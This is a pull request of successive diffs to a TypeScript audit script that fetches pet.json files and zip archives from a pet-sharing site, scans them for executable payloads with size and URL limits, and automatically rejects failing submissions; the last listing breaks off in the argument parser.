### PR TITLE
Add malicious pet security gate

### DIFF
--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -191,15 +191,20 @@ async function auditRow(row: Row): Promise<AuditResult> {
   const fetched = await fetchPetJson(row.petJsonUrl);
   if (!fetched.ok) {
     if (metadataScan.decision !== "pass") {
-      return {
-        slug: row.slug,
-        status: row.status,
-        decision: metadataScan.decision,
+      const scan = {
+        ...metadataScan,
         reasons: [
           ...metadataScan.reasons,
           `pet.json unavailable: ${fetched.reason}`,
         ],
-        applied: false,
+      };
+      const applied = await maybeApplySecurityRejection(row, scan);
+      return {
+        slug: row.slug,
+        status: row.status,
+        decision: scan.decision,
+        reasons: scan.reasons,
+        applied,
       };
     }
     return {
@@ -217,26 +222,7 @@ async function auditRow(row: Row): Promise<AuditResult> {
     description: row.description,
   });
 
-  let applied = false;
-  if (args.apply && scan.decision === "fail") {
-    const db = await getDb();
-    await recordSecurityReview(row, scan, false, db);
-    const actionDb = db as NonNullable<
-      Parameters<typeof applySubmissionAction>[2]
-    >["db"];
-    const result = await applySubmissionAction(
-      row.id,
-      {
-        action: "reject",
-        reason:
-          scan.reasons[0] ??
-          "Pet metadata contains a high-confidence executable payload.",
-      },
-      { actor: "auto-review", db: actionDb, skipSideEffects: !args.notify },
-    );
-    applied = result.ok;
-    if (!result.ok) scan.reasons.unshift(result.body.error);
-  }
+  const applied = await maybeApplySecurityRejection(row, scan);
 
   return {
     slug: row.slug,
@@ -245,6 +231,30 @@ async function auditRow(row: Row): Promise<AuditResult> {
     reasons: scan.reasons,
     applied,
   };
+}
+
+async function maybeApplySecurityRejection(
+  row: Row,
+  scan: PetSecurityScan,
+): Promise<boolean> {
+  if (!args.apply || scan.decision !== "fail") return false;
+  const db = await getDb();
+  await recordSecurityReview(row, scan, false, db);
+  const actionDb = db as NonNullable<
+    Parameters<typeof applySubmissionAction>[2]
+  >["db"];
+  const result = await applySubmissionAction(
+    row.id,
+    {
+      action: "reject",
+      reason:
+        scan.reasons[0] ??
+        "Pet metadata contains a high-confidence executable payload.",
+    },
+    { actor: "auto-review", db: actionDb, skipSideEffects: !args.notify },
+  );
+  if (!result.ok) scan.reasons.unshift(result.body.error);
+  return result.ok;
 }
 
 async function fetchPetJson(

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -1,7 +1,12 @@
 import { and, eq, inArray } from "drizzle-orm";
+import JSZip from "jszip";
 
 import * as schema from "@/lib/db/schema";
-import { type PetSecurityScan, scanPetSecurity } from "@/lib/pet-security";
+import {
+  type PetSecurityScan,
+  scanPetManifestsSecurity,
+  scanPetSecurity,
+} from "@/lib/pet-security";
 import { applySubmissionAction } from "@/lib/submission-decisions";
 import type { ReviewChecks } from "@/lib/submission-review-types";
 
@@ -26,6 +31,7 @@ type Row = {
   displayName: string;
   description: string;
   petJsonUrl: string;
+  zipUrl: string | null;
 };
 
 type AuditResult = {
@@ -37,6 +43,7 @@ type AuditResult = {
 };
 
 const MAX_PET_JSON_BYTES = 1024 * 1024;
+const MAX_ZIP_BYTES = 20 * 1024 * 1024;
 const PUBLIC_MANIFEST_URL = "https://petdex.crafter.run/api/manifest";
 
 const args = parseArgs();
@@ -99,6 +106,7 @@ async function loadRows(): Promise<Row[]> {
       displayName: schema.submittedPets.displayName,
       description: schema.submittedPets.description,
       petJsonUrl: schema.submittedPets.petJsonUrl,
+      zipUrl: schema.submittedPets.zipUrl,
     })
     .from(schema.submittedPets)
     .where(where)
@@ -128,6 +136,7 @@ async function loadManifestRows(url: string): Promise<Row[]> {
         pet.petJsonUrl,
         `pets[${index}].petJsonUrl`,
       ),
+      zipUrl: stringField(pet.zipUrl),
     };
   });
 }
@@ -188,39 +197,58 @@ async function auditRow(row: Row): Promise<AuditResult> {
     displayName: row.displayName,
     description: row.description,
   });
-  const fetched = await fetchPetJson(row.petJsonUrl);
-  if (!fetched.ok) {
-    if (metadataScan.decision !== "pass") {
-      const scan = {
-        ...metadataScan,
-        reasons: [
-          ...metadataScan.reasons,
-          `pet.json unavailable: ${fetched.reason}`,
-        ],
-      };
-      const applied = await maybeApplySecurityRejection(row, scan);
+  const [fetched, zipFetched] = await Promise.all([
+    fetchPetJson(row.petJsonUrl),
+    fetchZipPetJson(row.zipUrl),
+  ]);
+  if (!fetched.ok && !zipFetched.ok) {
+    if (metadataScan.decision === "pass") {
       return {
         slug: row.slug,
         status: row.status,
-        decision: scan.decision,
-        reasons: scan.reasons,
-        applied,
+        decision: "error",
+        reasons: [fetched.reason, zipFetched.reason],
+        applied: false,
       };
     }
+    const scan = {
+      ...metadataScan,
+      reasons: [
+        ...metadataScan.reasons,
+        `pet.json unavailable: ${fetched.reason}`,
+        `zip pet.json unavailable: ${zipFetched.reason}`,
+      ],
+    };
+    const applied = await maybeApplySecurityRejection(row, scan);
+    return {
+      slug: row.slug,
+      status: row.status,
+      decision: scan.decision,
+      reasons: scan.reasons,
+      applied,
+    };
+  }
+
+  const unavailableReasons = [
+    fetched.ok ? null : `pet.json unavailable: ${fetched.reason}`,
+    zipFetched.ok ? null : `zip pet.json unavailable: ${zipFetched.reason}`,
+  ].filter((reason): reason is string => Boolean(reason));
+  const scan = scanPetManifestsSecurity({
+    petJson: fetched.ok ? fetched.petJson : {},
+    zipPetJson: zipFetched.ok ? zipFetched.petJson : undefined,
+    displayName: row.displayName,
+    description: row.description,
+  });
+  if (scan.decision === "pass" && unavailableReasons.length > 0) {
     return {
       slug: row.slug,
       status: row.status,
       decision: "error",
-      reasons: [fetched.reason],
+      reasons: unavailableReasons,
       applied: false,
     };
   }
-
-  const scan = scanPetSecurity({
-    petJson: fetched.petJson,
-    displayName: row.displayName,
-    description: row.description,
-  });
+  if (unavailableReasons.length > 0) scan.reasons.push(...unavailableReasons);
 
   const applied = await maybeApplySecurityRejection(row, scan);
 
@@ -260,6 +288,49 @@ async function maybeApplySecurityRejection(
 async function fetchPetJson(
   url: string,
 ): Promise<{ ok: true; petJson: unknown } | { ok: false; reason: string }> {
+  const fetched = await fetchBuffer(url, MAX_PET_JSON_BYTES);
+  if (!fetched.ok) return fetched;
+  try {
+    return { ok: true, petJson: JSON.parse(fetched.buffer.toString("utf8")) };
+  } catch (error) {
+    return {
+      ok: false,
+      reason: error instanceof Error ? error.message : String(error),
+    };
+  }
+}
+
+async function fetchZipPetJson(
+  url: string | null,
+): Promise<{ ok: true; petJson: unknown } | { ok: false; reason: string }> {
+  if (!url) return { ok: false, reason: "zipUrl is missing" };
+  const fetched = await fetchBuffer(url, MAX_ZIP_BYTES);
+  if (!fetched.ok) return fetched;
+  try {
+    const archive = await JSZip.loadAsync(fetched.buffer);
+    const names = Object.keys(archive.files).filter((name) => {
+      const file = archive.files[name];
+      return !file?.dir && name.split("/").pop() === "pet.json";
+    });
+    if (names.length === 0)
+      return { ok: false, reason: "zip missing pet.json" };
+    if (names.length > 1) {
+      return { ok: false, reason: "zip contains multiple pet.json files" };
+    }
+    const raw = await archive.files[names[0]].async("string");
+    return { ok: true, petJson: JSON.parse(raw) };
+  } catch (error) {
+    return {
+      ok: false,
+      reason: error instanceof Error ? error.message : String(error),
+    };
+  }
+}
+
+async function fetchBuffer(
+  url: string,
+  maxBytes: number,
+): Promise<{ ok: true; buffer: Buffer } | { ok: false; reason: string }> {
   for (let attempt = 0; attempt <= args.retries; attempt++) {
     try {
       const res = await fetch(url, {
@@ -274,14 +345,14 @@ async function fetchPetJson(
         return { ok: false, reason: `pet.json fetch ${res.status}` };
       }
       const contentLength = Number(res.headers.get("content-length") ?? 0);
-      if (contentLength > MAX_PET_JSON_BYTES) {
-        return { ok: false, reason: "pet.json exceeds maximum audit size" };
+      if (contentLength > maxBytes) {
+        return { ok: false, reason: "asset exceeds maximum audit size" };
       }
       const buffer = Buffer.from(await res.arrayBuffer());
-      if (buffer.byteLength > MAX_PET_JSON_BYTES) {
-        return { ok: false, reason: "pet.json exceeds maximum audit size" };
+      if (buffer.byteLength > maxBytes) {
+        return { ok: false, reason: "asset exceeds maximum audit size" };
       }
-      return { ok: true, petJson: JSON.parse(buffer.toString("utf8")) };
+      return { ok: true, buffer };
     } catch (error) {
       if (attempt < args.retries) {
         await sleep(retryDelayMs(attempt));
@@ -293,7 +364,7 @@ async function fetchPetJson(
       };
     }
   }
-  return { ok: false, reason: "pet.json fetch failed" };
+  return { ok: false, reason: "asset fetch failed" };
 }
 
 async function recordSecurityReview(

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -51,6 +51,8 @@ type AuditResult = {
 
 const MAX_PET_JSON_BYTES = 1024 * 1024;
 const MAX_ZIP_BYTES = 20 * 1024 * 1024;
+const MAX_ZIP_PET_JSON_SCAN_ENTRIES = 16;
+const MAX_ZIP_PET_JSON_TOTAL_BYTES = MAX_PET_JSON_BYTES;
 const PUBLIC_MANIFEST_URL = "https://petdex.crafter.run/api/manifest";
 
 const args = parseArgs();
@@ -360,13 +362,22 @@ async function fetchZipPetJson(
     const reasons =
       names.length > 1 ? ["zip contains multiple pet.json files"] : [];
     const petJsons: ZipPetJson[] = [];
+    let totalBytes = 0;
     for (const name of names) {
-      const read = await readZipPetJson(
-        archive.files[name],
-        MAX_PET_JSON_BYTES,
-      );
+      if (petJsons.length >= MAX_ZIP_PET_JSON_SCAN_ENTRIES) {
+        reasons.push("zip pet.json scan entry limit reached");
+        break;
+      }
+      const entry = archive.files[name];
+      const size = zipEntryUncompressedSize(entry);
+      if (size !== null && totalBytes + size > MAX_ZIP_PET_JSON_TOTAL_BYTES) {
+        reasons.push("zip pet.json total size exceeds audit scan limit");
+        break;
+      }
+      const read = await readZipPetJson(entry, MAX_PET_JSON_BYTES);
       if (read.ok) {
         petJsons.push({ name, petJson: read.petJson });
+        totalBytes += size ?? 0;
       } else {
         reasons.push(`zip ${name}: ${read.reason}`);
       }

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -462,11 +462,7 @@ async function fetchBuffer(
       if (contentLength > maxBytes) {
         return { ok: false, reason: "asset exceeds maximum audit size" };
       }
-      const buffer = Buffer.from(await res.arrayBuffer());
-      if (buffer.byteLength > maxBytes) {
-        return { ok: false, reason: "asset exceeds maximum audit size" };
-      }
-      return { ok: true, buffer };
+      return await readResponseBuffer(res, maxBytes);
     } catch (error) {
       if (attempt < args.retries) {
         await sleep(retryDelayMs(attempt));
@@ -479,6 +475,27 @@ async function fetchBuffer(
     }
   }
   return { ok: false, reason: "asset fetch failed" };
+}
+
+async function readResponseBuffer(
+  res: Response,
+  maxBytes: number,
+): Promise<{ ok: true; buffer: Buffer } | { ok: false; reason: string }> {
+  const reader = res.body?.getReader();
+  if (!reader) return { ok: false, reason: "asset response body is empty" };
+  const chunks: Buffer[] = [];
+  let total = 0;
+  while (true) {
+    const chunk = await reader.read();
+    if (chunk.done) break;
+    total += chunk.value.byteLength;
+    if (total > maxBytes) {
+      await reader.cancel().catch(() => {});
+      return { ok: false, reason: "asset exceeds maximum audit size" };
+    }
+    chunks.push(Buffer.from(chunk.value));
+  }
+  return { ok: true, buffer: Buffer.concat(chunks, total) };
 }
 
 async function recordSecurityReview(

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -313,7 +313,7 @@ async function maybeApplySecurityRejection(
         petSecurityReason(scan, "fail") ??
         "Pet metadata contains a high-confidence executable payload.",
     },
-    { actor: "auto-review", db: actionDb, skipSideEffects: !args.notify },
+    { actor: "auto-review", db: actionDb, skipNotifications: !args.notify },
   );
   if (!result.ok) scan.reasons.unshift(result.body.error);
   return result.ok;

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -36,6 +36,11 @@ type Row = {
   zipUrl: string | null;
 };
 
+type ZipPetJson = {
+  name: string;
+  petJson: unknown;
+};
+
 type AuditResult = {
   slug: string;
   status: Row["status"];
@@ -235,12 +240,20 @@ async function auditRow(row: Row): Promise<AuditResult> {
     fetched.ok ? null : `pet.json unavailable: ${fetched.reason}`,
     zipFetched.ok ? null : `zip pet.json unavailable: ${zipFetched.reason}`,
   ].filter((reason): reason is string => Boolean(reason));
+  const zipPetJsons = zipFetched.ok ? zipFetched.petJsons : [];
   const scan = scanPetManifestsSecurity({
     petJson: fetched.ok ? fetched.petJson : {},
-    zipPetJson: zipFetched.ok ? zipFetched.petJson : undefined,
+    zipPetJson: zipPetJsons[0]?.petJson,
     displayName: row.displayName,
     description: row.description,
   });
+  if (zipFetched.ok) scan.reasons.push(...zipFetched.reasons);
+  for (const entry of zipPetJsons.slice(1)) {
+    appendZipPetJsonScan(scan, entry);
+  }
+  if (scan.decision === "pass" && zipFetched.ok && zipFetched.reasons.length) {
+    scan.decision = "hold";
+  }
   if (scan.decision === "pass" && unavailableReasons.length > 0) {
     return {
       slug: row.slug,
@@ -261,6 +274,25 @@ async function auditRow(row: Row): Promise<AuditResult> {
     reasons: scan.reasons,
     applied,
   };
+}
+
+function appendZipPetJsonScan(scan: PetSecurityScan, entry: ZipPetJson) {
+  const entryScan = scanPetSecurity({ petJson: entry.petJson });
+  scan.findings.push(
+    ...entryScan.findings.map((finding) => ({
+      ...finding,
+      path: `zip.petJson[${entry.name}]${finding.path === "$" ? "" : finding.path.startsWith("$") ? finding.path.slice(1) : `.${finding.path}`}`,
+    })),
+  );
+  scan.reasons.push(
+    ...entryScan.findings.map(
+      (finding) => `zip ${entry.name}: ${finding.code}: ${finding.evidence}`,
+    ),
+  );
+  if (entryScan.decision === "fail") scan.decision = "fail";
+  if (scan.decision === "pass" && entryScan.decision === "hold") {
+    scan.decision = "hold";
+  }
 }
 
 async function maybeApplySecurityRejection(
@@ -307,7 +339,10 @@ async function fetchPetJson(
 
 async function fetchZipPetJson(
   url: string | null,
-): Promise<{ ok: true; petJson: unknown } | { ok: false; reason: string }> {
+): Promise<
+  | { ok: true; petJsons: ZipPetJson[]; reasons: string[] }
+  | { ok: false; reason: string }
+> {
   if (!url) return { ok: false, reason: "zipUrl is missing" };
   if (!isAllowedAssetUrl(url)) {
     return { ok: false, reason: "zip URL is not allowed" };
@@ -322,10 +357,30 @@ async function fetchZipPetJson(
     });
     if (names.length === 0)
       return { ok: false, reason: "zip missing pet.json" };
-    if (names.length > 1) {
-      return { ok: false, reason: "zip contains multiple pet.json files" };
+    const reasons =
+      names.length > 1 ? ["zip contains multiple pet.json files"] : [];
+    const petJsons: ZipPetJson[] = [];
+    for (const name of names) {
+      const read = await readZipPetJson(
+        archive.files[name],
+        MAX_PET_JSON_BYTES,
+      );
+      if (read.ok) {
+        petJsons.push({ name, petJson: read.petJson });
+      } else {
+        reasons.push(`zip ${name}: ${read.reason}`);
+      }
     }
-    return await readZipPetJson(archive.files[names[0]], MAX_PET_JSON_BYTES);
+    if (petJsons.length === 0) {
+      return {
+        ok: false,
+        reason: reasons.join("; ") || "zip pet.json could not be scanned",
+      };
+    }
+    if (names.length > 1) {
+      return { ok: true, petJsons, reasons };
+    }
+    return { ok: true, petJsons, reasons };
   } catch (error) {
     return {
       ok: false,

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -4,6 +4,7 @@ import JSZip from "jszip";
 import * as schema from "@/lib/db/schema";
 import {
   type PetSecurityScan,
+  petSecurityPathSegment,
   petSecurityReason,
   scanPetManifestsSecurity,
   scanPetSecurity,
@@ -280,15 +281,16 @@ async function auditRow(row: Row): Promise<AuditResult> {
 
 function appendZipPetJsonScan(scan: PetSecurityScan, entry: ZipPetJson) {
   const entryScan = scanPetSecurity({ petJson: entry.petJson });
+  const entryName = petSecurityPathSegment(entry.name);
   scan.findings.push(
     ...entryScan.findings.map((finding) => ({
       ...finding,
-      path: `zip.petJson[${entry.name}]${finding.path === "$" ? "" : finding.path.startsWith("$") ? finding.path.slice(1) : `.${finding.path}`}`,
+      path: `zip.petJson[${JSON.stringify(entryName)}]${finding.path === "$" ? "" : finding.path.startsWith("$") ? finding.path.slice(1) : `.${finding.path}`}`,
     })),
   );
   scan.reasons.push(
     ...entryScan.findings.map(
-      (finding) => `zip ${entry.name}: ${finding.code}: ${finding.evidence}`,
+      (finding) => `zip ${entryName}: ${finding.code}: ${finding.evidence}`,
     ),
   );
   if (entryScan.decision === "fail") scan.decision = "fail";

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -10,6 +10,7 @@ import {
 } from "@/lib/pet-security";
 import { applySubmissionAction } from "@/lib/submission-decisions";
 import type { ReviewChecks } from "@/lib/submission-review-types";
+import { isAllowedAssetUrl } from "@/lib/url-allowlist";
 
 type Args = {
   apply: boolean;
@@ -289,6 +290,9 @@ async function maybeApplySecurityRejection(
 async function fetchPetJson(
   url: string,
 ): Promise<{ ok: true; petJson: unknown } | { ok: false; reason: string }> {
+  if (!isAllowedAssetUrl(url)) {
+    return { ok: false, reason: "pet.json URL is not allowed" };
+  }
   const fetched = await fetchBuffer(url, MAX_PET_JSON_BYTES);
   if (!fetched.ok) return fetched;
   try {
@@ -305,6 +309,9 @@ async function fetchZipPetJson(
   url: string | null,
 ): Promise<{ ok: true; petJson: unknown } | { ok: false; reason: string }> {
   if (!url) return { ok: false, reason: "zipUrl is missing" };
+  if (!isAllowedAssetUrl(url)) {
+    return { ok: false, reason: "zip URL is not allowed" };
+  }
   const fetched = await fetchBuffer(url, MAX_ZIP_BYTES);
   if (!fetched.ok) return fetched;
   try {

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -1,3 +1,5 @@
+import type { Readable } from "node:stream";
+
 import { and, eq, inArray } from "drizzle-orm";
 import JSZip from "jszip";
 
@@ -424,11 +426,14 @@ async function readZipPetJson(
   if (size > maxBytes) {
     return { ok: false, reason: "zip pet.json exceeds maximum audit size" };
   }
+  const streamed = await readZipEntryBuffer(
+    entry,
+    maxBytes,
+    "zip pet.json exceeds maximum audit size",
+  );
+  if (!streamed.ok) return streamed;
   try {
-    const bytes = Buffer.from(await entry.async("uint8array"));
-    if (bytes.byteLength > maxBytes) {
-      return { ok: false, reason: "zip pet.json exceeds maximum audit size" };
-    }
+    const bytes = streamed.buffer;
     return { ok: true, petJson: JSON.parse(bytes.toString("utf8")) };
   } catch (error) {
     return {
@@ -436,6 +441,42 @@ async function readZipPetJson(
       reason: error instanceof Error ? error.message : String(error),
     };
   }
+}
+
+function readZipEntryBuffer(
+  entry: JSZip.JSZipObject,
+  maxBytes: number,
+  sizeReason: string,
+): Promise<{ ok: true; buffer: Buffer } | { ok: false; reason: string }> {
+  return new Promise((resolve) => {
+    const stream = entry.nodeStream("nodebuffer") as Readable;
+    const chunks: Buffer[] = [];
+    let total = 0;
+    let settled = false;
+    const finish = (
+      result: { ok: true; buffer: Buffer } | { ok: false; reason: string },
+    ) => {
+      if (settled) return;
+      settled = true;
+      resolve(result);
+    };
+    stream.on("data", (chunk) => {
+      const buffer = Buffer.isBuffer(chunk) ? chunk : Buffer.from(chunk);
+      total += buffer.byteLength;
+      if (total > maxBytes) {
+        stream.destroy();
+        finish({ ok: false, reason: sizeReason });
+        return;
+      }
+      chunks.push(buffer);
+    });
+    stream.on("error", () => {
+      finish({ ok: false, reason: "zip pet.json could not be read" });
+    });
+    stream.on("end", () => {
+      finish({ ok: true, buffer: Buffer.concat(chunks, total) });
+    });
+  });
 }
 
 function zipEntryUncompressedSize(entry: JSZip.JSZipObject): number | null {

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -303,7 +303,6 @@ async function maybeApplySecurityRejection(
 ): Promise<boolean> {
   if (!args.apply || scan.decision !== "fail") return false;
   const db = await getDb();
-  await recordSecurityReview(row, scan, false, db);
   const actionDb = db as NonNullable<
     Parameters<typeof applySubmissionAction>[2]
   >["db"];
@@ -318,6 +317,14 @@ async function maybeApplySecurityRejection(
     { actor: "auto-review", db: actionDb, skipNotifications: !args.notify },
   );
   if (!result.ok) scan.reasons.unshift(result.body.error);
+  await recordSecurityReview(
+    row,
+    scan,
+    false,
+    db,
+    result.ok,
+    result.ok ? null : result.body.error,
+  );
   return result.ok;
 }
 
@@ -479,6 +486,8 @@ async function recordSecurityReview(
   scan: PetSecurityScan,
   dryRun: boolean,
   db: Awaited<ReturnType<typeof getDb>>,
+  applied: boolean,
+  applyReason: string | null,
 ) {
   const now = new Date();
   const reviewId = `review_${crypto.randomUUID().replace(/-/g, "").slice(0, 22)}`;
@@ -501,7 +510,7 @@ async function recordSecurityReview(
       semanticMatches: [],
       metadataMatches: [],
     },
-    autopilot: { applied: false, dryRun, reason: null },
+    autopilot: { applied, dryRun, reason: applyReason },
   };
 
   await db.insert(schema.submissionReviews).values({

--- a/scripts/audit-pet-security.ts
+++ b/scripts/audit-pet-security.ts
@@ -1,0 +1,440 @@
+import { and, eq, inArray } from "drizzle-orm";
+
+import * as schema from "@/lib/db/schema";
+import { type PetSecurityScan, scanPetSecurity } from "@/lib/pet-security";
+import { applySubmissionAction } from "@/lib/submission-decisions";
+import type { ReviewChecks } from "@/lib/submission-review-types";
+
+type Args = {
+  apply: boolean;
+  notify: boolean;
+  includePending: boolean;
+  json: boolean;
+  limit: number;
+  concurrency: number;
+  timeoutMs: number;
+  retries: number;
+  delayMs: number;
+  slug: string | null;
+  manifestUrl: string | null;
+};
+
+type Row = {
+  id: string;
+  slug: string;
+  status: "pending" | "approved" | "rejected";
+  displayName: string;
+  description: string;
+  petJsonUrl: string;
+};
+
+type AuditResult = {
+  slug: string;
+  status: Row["status"];
+  decision: PetSecurityScan["decision"] | "error";
+  reasons: string[];
+  applied: boolean;
+};
+
+const MAX_PET_JSON_BYTES = 1024 * 1024;
+const PUBLIC_MANIFEST_URL = "https://petdex.crafter.run/api/manifest";
+
+const args = parseArgs();
+const results: AuditResult[] = [];
+
+async function main() {
+  if (args.apply && args.manifestUrl) {
+    throw new Error("--apply requires DATABASE_URL mode, not --manifest-url");
+  }
+  const rows = await loadRows();
+
+  log(
+    `auditing ${rows.length} pets source=${args.manifestUrl ?? "database"} apply=${args.apply ? "YES" : "no"} notify=${args.notify ? "YES" : "no"} concurrency=${args.concurrency}`,
+  );
+
+  let nextIndex = 0;
+  async function worker(workerId: number) {
+    while (true) {
+      const index = nextIndex++;
+      if (index >= rows.length) return;
+      const row = rows[index] as Row;
+      const result = await auditRow(row);
+      results.push(result);
+      log(
+        `[${index + 1}/${rows.length}] worker=${workerId} ${row.slug} ${result.status} -> ${result.decision}${result.applied ? " applied" : ""}${result.reasons[0] ? ` ${result.reasons[0]}` : ""}`,
+      );
+      if (args.delayMs > 0) await sleep(args.delayMs);
+    }
+  }
+
+  await Promise.all(
+    Array.from(
+      { length: Math.min(args.concurrency, rows.length || 1) },
+      (_, index) => worker(index + 1),
+    ),
+  );
+
+  printSummary();
+}
+
+async function loadRows(): Promise<Row[]> {
+  if (args.manifestUrl) return loadManifestRows(args.manifestUrl);
+
+  const db = await getDb();
+  const statuses: Row["status"][] = args.includePending
+    ? ["approved", "pending"]
+    : ["approved"];
+  const where = args.slug
+    ? and(
+        eq(schema.submittedPets.slug, args.slug),
+        inArray(schema.submittedPets.status, statuses),
+      )
+    : inArray(schema.submittedPets.status, statuses);
+
+  const rows = await db
+    .select({
+      id: schema.submittedPets.id,
+      slug: schema.submittedPets.slug,
+      status: schema.submittedPets.status,
+      displayName: schema.submittedPets.displayName,
+      description: schema.submittedPets.description,
+      petJsonUrl: schema.submittedPets.petJsonUrl,
+    })
+    .from(schema.submittedPets)
+    .where(where)
+    .limit(args.limit);
+
+  return rows as Row[];
+}
+
+async function loadManifestRows(url: string): Promise<Row[]> {
+  const res = await fetch(url, {
+    redirect: "error",
+    signal: AbortSignal.timeout(args.timeoutMs),
+  });
+  if (!res.ok) throw new Error(`manifest fetch ${res.status}`);
+  const json = await res.json();
+  const pets = isRecord(json) && Array.isArray(json.pets) ? json.pets : [];
+  return pets.slice(0, args.limit).map((pet, index) => {
+    if (!isRecord(pet)) throw new Error(`manifest pet ${index} is not object`);
+    const slug = stringField(pet.slug) ?? `manifest-${index}`;
+    return {
+      id: slug,
+      slug,
+      status: "approved",
+      displayName: stringField(pet.displayName) ?? slug,
+      description: "",
+      petJsonUrl: requiredStringField(
+        pet.petJsonUrl,
+        `pets[${index}].petJsonUrl`,
+      ),
+    };
+  });
+}
+
+function printSummary() {
+  const fail = results.filter((result) => result.decision === "fail");
+  const hold = results.filter((result) => result.decision === "hold");
+  const error = results.filter((result) => result.decision === "error");
+  const applied = results.filter((result) => result.applied);
+
+  if (args.json) {
+    console.log(
+      JSON.stringify(
+        {
+          total: results.length,
+          counts: {
+            fail: fail.length,
+            hold: hold.length,
+            error: error.length,
+            applied: applied.length,
+          },
+          fail,
+          hold,
+          error,
+          applied,
+        },
+        null,
+        2,
+      ),
+    );
+    return;
+  }
+
+  console.log("");
+  console.log(
+    `done total=${results.length} fail=${fail.length} hold=${hold.length} error=${error.length} applied=${applied.length}`,
+  );
+
+  for (const group of [
+    ["fail", fail],
+    ["hold", hold],
+    ["error", error],
+  ] as const) {
+    if (group[1].length === 0) continue;
+    console.log("");
+    console.log(`${group[0]}:`);
+    for (const result of group[1]) {
+      console.log(
+        `- ${result.slug} [${result.status}] ${result.reasons.join("; ")}`,
+      );
+    }
+  }
+}
+
+async function auditRow(row: Row): Promise<AuditResult> {
+  const metadataScan = scanPetSecurity({
+    petJson: {},
+    displayName: row.displayName,
+    description: row.description,
+  });
+  const fetched = await fetchPetJson(row.petJsonUrl);
+  if (!fetched.ok) {
+    if (metadataScan.decision !== "pass") {
+      return {
+        slug: row.slug,
+        status: row.status,
+        decision: metadataScan.decision,
+        reasons: [
+          ...metadataScan.reasons,
+          `pet.json unavailable: ${fetched.reason}`,
+        ],
+        applied: false,
+      };
+    }
+    return {
+      slug: row.slug,
+      status: row.status,
+      decision: "error",
+      reasons: [fetched.reason],
+      applied: false,
+    };
+  }
+
+  const scan = scanPetSecurity({
+    petJson: fetched.petJson,
+    displayName: row.displayName,
+    description: row.description,
+  });
+
+  let applied = false;
+  if (args.apply && scan.decision === "fail") {
+    const db = await getDb();
+    await recordSecurityReview(row, scan, false, db);
+    const actionDb = db as NonNullable<
+      Parameters<typeof applySubmissionAction>[2]
+    >["db"];
+    const result = await applySubmissionAction(
+      row.id,
+      {
+        action: "reject",
+        reason:
+          scan.reasons[0] ??
+          "Pet metadata contains a high-confidence executable payload.",
+      },
+      { actor: "auto-review", db: actionDb, skipSideEffects: !args.notify },
+    );
+    applied = result.ok;
+    if (!result.ok) scan.reasons.unshift(result.body.error);
+  }
+
+  return {
+    slug: row.slug,
+    status: row.status,
+    decision: scan.decision,
+    reasons: scan.reasons,
+    applied,
+  };
+}
+
+async function fetchPetJson(
+  url: string,
+): Promise<{ ok: true; petJson: unknown } | { ok: false; reason: string }> {
+  for (let attempt = 0; attempt <= args.retries; attempt++) {
+    try {
+      const res = await fetch(url, {
+        redirect: "error",
+        signal: AbortSignal.timeout(args.timeoutMs),
+      });
+      if (!res.ok) {
+        if (shouldRetryStatus(res.status) && attempt < args.retries) {
+          await sleep(retryDelayMs(attempt, res.headers));
+          continue;
+        }
+        return { ok: false, reason: `pet.json fetch ${res.status}` };
+      }
+      const contentLength = Number(res.headers.get("content-length") ?? 0);
+      if (contentLength > MAX_PET_JSON_BYTES) {
+        return { ok: false, reason: "pet.json exceeds maximum audit size" };
+      }
+      const buffer = Buffer.from(await res.arrayBuffer());
+      if (buffer.byteLength > MAX_PET_JSON_BYTES) {
+        return { ok: false, reason: "pet.json exceeds maximum audit size" };
+      }
+      return { ok: true, petJson: JSON.parse(buffer.toString("utf8")) };
+    } catch (error) {
+      if (attempt < args.retries) {
+        await sleep(retryDelayMs(attempt));
+        continue;
+      }
+      return {
+        ok: false,
+        reason: error instanceof Error ? error.message : String(error),
+      };
+    }
+  }
+  return { ok: false, reason: "pet.json fetch failed" };
+}
+
+async function recordSecurityReview(
+  row: Row,
+  scan: PetSecurityScan,
+  dryRun: boolean,
+  db: Awaited<ReturnType<typeof getDb>>,
+) {
+  const now = new Date();
+  const reviewId = `review_${crypto.randomUUID().replace(/-/g, "").slice(0, 22)}`;
+  const checks: ReviewChecks = {
+    security: scan,
+    assets: { decision: "pass", reasons: [] },
+    policy: {
+      decision: "hold",
+      confidence: 0,
+      reasons: [
+        "Policy review skipped after deterministic security rejection.",
+      ],
+      flags: [],
+    },
+    duplicates: {
+      decision: "pass",
+      reasons: [],
+      exactMatches: [],
+      visualMatches: [],
+      semanticMatches: [],
+      metadataMatches: [],
+    },
+    autopilot: { applied: false, dryRun, reason: null },
+  };
+
+  await db.insert(schema.submissionReviews).values({
+    id: reviewId,
+    submittedPetId: row.id,
+    status: "completed",
+    decision: "auto_reject",
+    reasonCode: "security_malicious_pet_json",
+    summary:
+      scan.reasons[0] ??
+      "Pet metadata contains a high-confidence executable payload.",
+    confidence: 100,
+    checks,
+    model: "deterministic-security-scan",
+    dryRun,
+    error: null,
+    reviewedAt: now,
+    createdAt: now,
+    updatedAt: now,
+  });
+}
+
+function parseArgs(): Args {
+  const out: Args = {
+    apply: false,
+    notify: false,
+    includePending: false,
+    json: false,
+    limit: 5000,
+    concurrency: 16,
+    timeoutMs: 5_000,
+    retries: 2,
+    delayMs: 0,
+    slug: null,
+    manifestUrl: null,
+  };
+  const argv = process.argv.slice(2);
+  for (let index = 0; index < argv.length; index++) {
+    const arg = argv[index];
+    if (arg === "--apply") out.apply = true;
+    else if (arg === "--notify") out.notify = true;
+    else if (arg === "--include-pending") out.includePending = true;
+    else if (arg === "--json") out.json = true;
+    else if (arg === "--public") out.manifestUrl = PUBLIC_MANIFEST_URL;
+    else if (arg === "--limit")
+      out.limit = readNumber(argv[++index], out.limit);
